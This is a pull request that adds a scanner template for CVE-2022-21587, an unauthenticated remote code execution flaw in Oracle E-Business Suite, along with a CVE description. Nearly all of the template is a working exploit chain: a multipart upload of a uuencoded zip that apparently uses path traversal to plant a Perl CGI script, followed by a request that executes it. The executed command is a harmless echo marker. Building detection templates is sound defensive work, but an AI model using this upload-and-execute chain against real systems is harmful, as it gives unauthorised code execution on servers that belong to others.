### PR TITLE
Create CVE-2022-21587.yaml

### DIFF
--- a/cves/2022/CVE-2022-21587.yaml
+++ b/cves/2022/CVE-2022-21587.yaml
@@ -1,0 +1,71 @@
+id: CVE-2022-21587
+
+info:
+  name: Oracle EBS Unauthenticated - Remote Code Execution
+  author: rootxharsh,iamnoooob
+  severity: critical
+  description:
+  reference:
+    - https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/
+    - https://www.oracle.com/security-alerts/cpuoct2022.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-21587
+  tags: cve,cve2022,rce,oast,intrusive,oracle,ebs,unauth
+
+requests:
+  - raw:
+      - |
+        POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv
+
+        ------WebKitFormBoundaryZsMro0UsAQYLDZGv
+        Content-Disposition: form-data; name="bne:uueupload"
+
+        TRUE
+        ------WebKitFormBoundaryZsMro0UsAQYLDZGv
+        Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip"
+
+        begin 664 test.zip
+        M4$L#!!0``````"]P-%;HR5LG>@```'H```!#````+BXO+BXO+BXO+BXO+BXO
+        M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.
+        M1%=24BYP;'5S92!#1TD["G!R:6YT($-'23HZ:&5A9&5R*"`M='EP92`]/B`G
+        M=&5X="]P;&%I;B<@*3L*;7D@)&-M9"`](")E8VAO($YU8VQE:2U#5D4M,C`R
+        M,BTR,34X-R(["G!R:6YT('-Y<W1E;2@D8VUD*3L*97AI="`P.PH*4$L!`A0#
+        M%```````+W`T5NC)6R=Z````>@```$,``````````````+2!`````"XN+RXN
+        M+RXN+RXN+RXN+T9-5U](;VUE+T]R86-L95]%0E,M87!P,2]C;VUM;VXO<V-R
+        G:7!T<R]T>&M&3D174E(N<&Q02P4&``````$``0!Q````VP``````
+        `
+        end
+        ------WebKitFormBoundaryZsMro0UsAQYLDZGv--
+
+      - |
+        GET /OA_CGI/FNDWRR.exe HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv
+
+        ------WebKitFormBoundaryZsMro0UsAQYLDZGv
+        Content-Disposition: form-data; name="bne:uueupload"
+
+        TRUE
+        ------WebKitFormBoundaryZsMro0UsAQYLDZGv
+        Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip"
+
+        begin 664 test.zip
+        M4$L#!!0``````&UP-%:3!M<R`0````$```!#````+BXO+BXO+BXO+BXO+BXO
+        M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.
+        M1%=24BYP;`I02P$"%`,4``````!M<#16DP;7,@$````!````0P``````````
+        M````M($`````+BXO+BXO+BXO+BXO+BXO1DU77TAO;64O3W)A8VQE7T5"4RUA
+        M<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.1%=24BYP;%!+!08``````0`!`'$`
+        (``!B````````
+        `
+        end
+
+    matchers:
+      - type: word
+        part: body_2
+        words:
+          - Nuclei-CVE-2022-21587

--- a/cves/2022/CVE-2022-21587.yaml
+++ b/cves/2022/CVE-2022-21587.yaml
@@ -4,7 +4,8 @@ info:
   name: Oracle EBS Unauthenticated - Remote Code Execution
   author: rootxharsh,iamnoooob
   severity: critical
-  description:
+  description: |
+    Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: Upload). Supported versions that are affected are 12.2.3-12.2.11. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks of this vulnerability can result in takeover of Oracle Web Applications Desktop Integrator.
   reference:
     - https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/
     - https://www.oracle.com/security-alerts/cpuoct2022.html


### PR DESCRIPTION
### Template / PR Information
Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: Upload). Supported versions that are affected are 12.2.3-12.2.11. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks of this vulnerability can result in takeover of Oracle Web Applications Desktop Integrator. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

- References: https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)